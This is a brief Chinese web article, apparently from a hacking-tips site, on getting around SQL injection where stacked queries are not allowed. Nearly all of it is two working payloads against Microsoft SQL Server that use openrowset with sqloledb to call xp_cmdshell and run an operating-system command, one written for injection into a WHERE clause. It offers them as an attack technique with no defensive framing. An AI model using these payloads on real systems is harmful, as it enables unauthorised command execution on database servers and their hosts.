SQL注入不能多句执行时的突破方法
时间:2011-03-22 来源:秩名
SQL执行
select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:''')
and 0<>(select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:'''))
标签分类:
相关阅读 更多 +
